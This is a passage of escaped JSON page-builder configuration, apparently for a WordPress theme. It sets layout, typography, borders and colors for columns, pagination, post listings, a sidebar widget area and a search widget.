alue\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":128,\"type\":\"hop-archive-pagination\",\"nodeId\":\"26-m14\",\"style\":{\"descendants\":{\"paginationNumbers\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}},\"paginationActiveNumber\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0}\"}}}},\"v\":\"1.1\",\"nodes\":[\"435-m22\"]},{\"id\":129,\"type\":\"hop-column\",\"nodeId\":\"19-m38\",\"nodes\":[\"435-m23\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"15\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":130,\"type\":\"hop-archive-nav-button\",\"nodeId\":\"26-m21\",\"style\":{\"descendants\":{\"paginationNavigationButton\":{\"border\":{\"bottom\":{\"color\":\"${theme.colors.5}\",\"radius\":{\"left\":{\"value\":0},\"right\":{\"value\":0}}},\"top\":{\"color\":\"${theme.colors.5}\",\"radius\":{\"left\":{\"value\":0},\"right\":{\"value\":0}}},\"left\":{\"color\":\"${theme.colors.5}\"},\"right\":{\"color\":\"${theme.colors.5}\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\"}}}},\"v\":\"1.1\",\"nodes\":[\"435-m24\"]},{\"id\":131,\"type\":\"hop-main\",\"nodeId\":\"35-m1\",\"v\":\"1.1\",\"nodes\":[\"22-m1\",\"636-m1\"]},{\"id\":132,\"type\":\"hop-row\",\"nodeId\":\"1735-m2\",\"props\":{\"layout\":{\"itemsPerRow\":2,\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"22-m2\",\"636-m2\"]},{\"id\":133,\"type\":\"hop-column\",\"nodeId\":\"35-m3\",\"style\":{\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"22-m3\",\"636-m3\"]},{\"id\":134,\"type\":\"hop-heading\",\"nodeId\":\"1735-m11\",\"style\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"size\":{\"unit\":\"em\",\"value\":\"10\"}}},\"props\":{\"headerType\":\"2\"},\"v\":\"1.1\",\"nodes\":[\"22-m4\",\"636-m4\"]},{\"id\":135,\"type\":\"hop-text\",\"nodeId\":\"1735-m12\",\"v\":\"1.1\",\"nodes\":[\"22-m5\",\"636-m5\"]},{\"id\":136,\"type\":\"hop-home-button-group\",\"nodeId\":\"22-m8\",\"v\":\"1.1\",\"nodes\":[\"22-m6\",\"636-m6\"]},{\"id\":137,\"type\":\"hop-home-button\",\"nodeId\":\"22-m9\",\"style\":{\"background\":{\"color\":\"rgba(3, 169, 244, 0)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(2, 110, 159, 0)\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"typography\":{\"color\":\"${theme.colors.0}\",\"transform\":\"none\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"400\",\"lineHeight\":{\"value\":\"1.5\"},\"family\":\"Open Sans\",\"margin\":{\"bottom\":\"2rem\"},\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"}},\"border\":{\"top\":{\"style\":\"none\",\"color\":\"${theme.colors.0}\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"left\":{\"style\":\"none\",\"color\":\"${theme.colors.0}\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"color\":\"${theme.colors.0}\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"color\":\"${theme.colors.0}\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}}},\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\"}},\"descendants\":{\"icon\":{\"size\":{\"value\":\"16\",\"unit\":\"px\"},\"margin\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"textAlign\":\"center\"},\"props\":{\"showIcon\":true,\"iconPosition\":\"after\"},\"v\":\"1.1\",\"nodes\":[\"22-m7\",\"636-m7\"]},{\"id\":138,\"type\":\"hop-main\",\"nodeId\":\"38-m1\",\"v\":\"1.1\",\"nodes\":[\"25-m1\",\"639-m1\"]},{\"id\":139,\"type\":\"hop-archive-loop\",\"nodeId\":\"1738-m4\",\"props\":{\"layout\":{\"horizontalGap\":3,\"verticalGap\":3,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"itemsPerRow\":1,\"horizontalAlign\":\"start\",\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}}},\"showMasonry\":false,\"media\":{\"mobile\":{\"layout\":{\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":2}}}},\"v\":\"1.1\",\"nodes\":[\"25-m2\",\"639-m2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":140,\"type\":\"hop-loop-item\",\"nodeId\":\"1706-c10\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"y\":\"10\",\"spread\":\"0\",\"blur\":\"40\",\"color\":\"rgba(1, 51, 74, 0.15)\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"padding\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"textAlign\":\"left\"},\"v\":\"1.1\",\"nodes\":[\"25-m3\",\"639-m3\"],\"props\":{\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":3}}},{\"id\":141,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-post-categories-container\",\"nodeId\":\"25-m20\",\"nodes\":[\"25-m4\",\"639-m4\"],\"v\":\"1.1\",\"style\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":142,\"type\":\"hop-column\",\"nodeId\":\"25-m21\",\"nodes\":[\"25-m5\",\"639-m5\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\"}},{\"id\":143,\"type\":\"hop-post-categories\",\"nodeId\":\"1738-m11\",\"style\":{\"descendants\":{\"categoriesLinks\":{\"typography\":{\"transform\":\"lowercase\",\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"25-m6\",\"639-m6\"]},{\"id\":144,\"type\":\"hop-post-title\",\"nodeId\":\"38-m7\",\"v\":\"1.1\",\"nodes\":[\"25-m7\",\"639-m7\"]},{\"id\":145,\"type\":\"hop-post-meta\",\"nodeId\":\"1706-c21\",\"style\":{\"descendants\":{\"metaDataLinks\":{\"typography\":{\"color\":\"${theme.colors.5|variant1}\",\"transform\":\"lowercase\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"decoration\":\"none\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}}},\"icons\":{\"height\":{\"value\":\"24\"},\"width\":{\"value\":\"24\"},\"margin\":{\"right\":{\"value\":\"5\"}},\"display\":\"none\"},\"metaDataPrefix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant2}\"}},\"metaDataSuffix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant1}\"}},\"separators\":{\"typography\":{\"color\":\"${theme.colors.5|variant1}\"}}}},\"v\":\"1.1\",\"nodes\":[\"25-m8\",\"639-m8\"]},{\"id\":146,\"type\":\"hop-post-excerpt\",\"nodeId\":\"38-m8\",\"v\":\"1.1\",\"nodes\":[\"25-m9\",\"639-m9\"],\"style\":{\"descendants\":{\"excerpt\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}}}},{\"id\":147,\"type\":\"hop-post-read-more-group\",\"nodeId\":\"25-m20\",\"nodes\":[\"25-m10\",\"639-m10\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":20,\"unit\":\"%\"}}}}}},{\"id\":148,\"type\":\"hop-post-read-more\",\"nodeId\":\"25-m21\",\"nodes\":[\"25-m11\",\"639-m11\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"center\",\"typography\":{\"color\":\"${theme.colors.0}\",\"family\":\"Open Sans\",\"margin\":{\"top\":\"\",\"bottom\":\"2rem\"},\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"400\",\"lineHeight\":{\"value\":\"1.6\",\"unit\":\"\"},\"letterSpacing\":{\"value\":\"\",\"unit\":\"px\"}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"},\"radius\":{\"right\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"},\"left\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"}}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"},\"radius\":{\"right\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"},\"left\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"}}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"margin\":{\"left\":{\"value\":\"5\",\"unit\":\"px\",\"path\":\"value\"},\"right\":{\"value\":0,\"unit\":\"px\"}}},\"image\":{\"boxShadow\":{\"enabled\":false,\"layers\":[{\"x\":\"2\",\"y\":\"2\",\"spread\":\"10\",\"blur\":\"2\",\"color\":\"#333\"}]}},\"frameImage\":{\"backgroundColor\":\"transparent\",\"width\":{\"value\":100},\"height\":{\"value\":100},\"thickness\":10,\"border\":{\"top\":{\"width\":{\"value\":10},\"color\":\"rgba(0, 0, 0, 0.5)\",\"style\":\"solid\"},\"bottom\":{\"width\":{\"value\":10},\"color\":\"rgba(0, 0, 0, 0.5)\",\"style\":\"solid\"},\"left\":{\"width\":{\"value\":10},\"color\":\"rgba(0, 0, 0, 0.5)\",\"style\":\"solid\"},\"right\":{\"width\":{\"value\":10},\"color\":\"rgba(0, 0, 0, 0.5)\",\"style\":\"solid\"}},\"transform\":{\"translate\":{\"x\":{\"path\":\"value\"},\"x_value\":\"4\",\"y\":{\"path\":\"value\"},\"y_value\":\"6\"}},\"zIndex\":-1}}},\"props\":{\"showIcon\":true,\"iconPosition\":\"after\",\"frame\":{\"type\":\"border\"},\"enabledFrameOption\":false,\"showFrameOverImage\":false,\"showFrameShadow\":false}},{\"id\":149,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-post-nav-container\",\"nodeId\":\"25-m22\",\"nodes\":[\"25-m12\",\"639-m12\"],\"v\":\"1.1\",\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"}},\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"30\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"30\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}}}}},{\"id\":150,\"type\":\"hop-column\",\"nodeId\":\"25-m22\",\"nodes\":[\"25-m13\",\"639-m13\"],\"v\":\"1.1\"},{\"id\":151,\"type\":\"hop-column\",\"nodeId\":\"25-m23\",\"nodes\":[\"25-m14\",\"639-m14\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"15\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":152,\"type\":\"hop-archive-nav-button\",\"nodeId\":\"1725-m29\",\"style\":{\"descendants\":{\"paginationNavigationButton\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant3}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"25-m15\",\"639-m15\"]},{\"id\":153,\"type\":\"hop-column\",\"nodeId\":\"25-m41\",\"nodes\":[\"25-m16\",\"639-m16\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":154,\"type\":\"hop-archive-pagination\",\"nodeId\":\"26-m14\",\"style\":{\"descendants\":{\"paginationNumbers\":{\"typography\":{\"color\":\"${theme.colors.5}\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"size\":{\"unit\":\"px\",\"value\":\"16\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}},\"paginationActiveNumber\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0}\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"size\":{\"unit\":\"px\",\"value\":\"16\"}}}}},\"v\":\"1.1\",\"nodes\":[\"25-m17\",\"639-m17\"]},{\"id\":155,\"type\":\"hop-column\",\"nodeId\":\"25-m24\",\"nodes\":[\"25-m18\",\"639-m18\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"15\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":156,\"type\":\"hop-archive-nav-button\",\"nodeId\":\"1725-m27\",\"style\":{\"descendants\":{\"paginationNavigationButton\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"25-m19\",\"639-m19\"]},{\"id\":157,\"type\":\"hop-row\",\"nodeId\":\"38-m2\",\"props\":{\"layout\":{\"itemsPerRow\":1,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":1,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}}},\"v\":\"1.1\",\"nodes\":[\"25-m20\",\"639-m20\"]},{\"id\":158,\"type\":\"hop-column\",\"nodeId\":\"38-m3\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"v\":\"1.1\",\"nodes\":[\"25-m21\",\"639-m21\"],\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}},{\"id\":159,\"type\":\"hop-archive-navigation\",\"nodeId\":\"38-m9\",\"v\":\"1.1\",\"nodes\":[\"25-m22\",\"639-m22\"]},{\"id\":160,\"type\":\"hop-sidebar\",\"nodeId\":\"4455-s1\",\"props\":{\"attrs\":{\"overflowOption\":\"visible\"}},\"v\":\"1.1\",\"nodes\":[\"438-s1\"]},{\"id\":161,\"type\":\"hop-section\",\"nodeId\":\"28-s9\",\"nodes\":[\"438-s2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\"},\"bottom\":{\"value\":\"0\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"value\":\"0\"}}}}},\"v\":\"1.1\"},{\"id\":162,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"28-s13\",\"nodes\":[\"438-s13\"],\"v\":\"1.1\"},{\"id\":163,\"type\":\"hop-column\",\"nodeId\":\"28-s14\",\"nodes\":[\"438-s14\"],\"v\":\"1.1\"},{\"id\":164,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"28-s15\",\"nodes\":[\"438-s15\"],\"v\":\"1.1\"},{\"id\":165,\"type\":\"hop-text\",\"nodeId\":\"28-s16\",\"nodes\":[\"438-s16\"],\"v\":\"1.1\"},{\"id\":166,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"itemsPerRow\":1},\"media\":{\"mobile\":{\"layout\":{\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"nodeId\":\"28-s10\",\"nodes\":[\"438-s3\"],\"v\":\"1.1\"},{\"id\":167,\"type\":\"hop-column\",\"nodeId\":\"28-s12\",\"nodes\":[\"438-s4\"],\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"v\":\"1.1\",\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}},{\"id\":168,\"type\":\"hop-widget-area\",\"nodeId\":\"1719-s2\",\"style\":{\"descendants\":{\"widgetBox\":{\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"20\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"mobile\":{\"textAlign\":\"center\"}}},\"widgetListItemLink\":{\"typography\":{\"color\":\"${theme.colors.4|variant3}\",\"decoration\":\"none\",\"weight\":\"400\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"family\":\"Open Sans\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(0, 0, 0)\"}}}},\"widgetListItem\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"decoration\":\"none\",\"weight\":\"400\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"family\":\"Open Sans\"},\"padding\":{\"top\":{\"value\":\"4\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"4\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}}},\"widgetTitle\":{\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"600\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"widgetList\":{\"listStyleType\":\"none\"},\"widgetInput\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"weight\":\"400\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}},\"states\":{\"focus\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}},\"border\":{\"top\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"bottom\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"right\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"left\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"}}}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}}},\"v\":\"1.1\",\"nodes\":[\"438-s5\"]},{\"id\":169,\"type\":\"hop-search-widget\",\"nodeId\":\"1719-s3\",\"style\":{\"descendants\":{\"widget-box\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\"}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},\"background\":{\"color\":\"\"}},\"widget-title\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}},\"bottom\":{\"radius\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}},\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}}},\"widget-input\":{\"border\":{\"top\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"bottom\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"right\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"left\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":\"12\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"12\",\"unit\":\"px\"}},\"background\":{\"color\":\"rgb(249, 250, 